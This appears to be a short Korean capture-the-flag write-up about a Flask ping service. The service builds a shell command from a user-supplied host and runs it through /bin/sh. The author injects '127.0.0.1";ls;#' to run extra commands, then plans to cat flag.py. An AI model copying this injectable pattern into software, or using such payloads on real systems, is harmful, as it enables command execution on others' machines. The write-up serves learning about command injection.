📒 Description
플래그는 flag.py에 있다 한다.
📒 Analysis & Exploit
📖 app.py
#!/usr/bin/env python3
import subprocess
from flask import Flask, request, render_template, redirect
from flag import FLAG
APP = Flask(__name__)
@APP.route('/')
def index():
return render_template('index.html')
@APP.route('/ping', methods=['GET', 'POST'])
def ping():
if request.method == 'POST':
host = request.form.get('host')
cmd = f'ping -c 3 "{host}"'
try:
output = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
return render_template('ping_result.html', data=output.decode('utf-8'))
except subprocess.TimeoutExpired:
return render_template('ping_result.html', data='Timeout !')
except subprocess.CalledProcessError:
return render_template('ping_result.html', data=f'an error occurred while executing the command. -> {cmd}')
return render_template('ping.html')
if __name__ == '__main__':
APP.run(host='0.0.0.0', port=8000)
이렇게 입력해보자.
ping -c 3 "127.0.0.1";ls;#"이렇게 넘어가지게 된다. 따라서 ls; 까지는 무난히 실행되고 뒤에 있는 따옴표는 주석처리 된다.
그 결과는 위와 같으며 cat으로 flag.py를 출력해주면 되겠다.
Today I Learned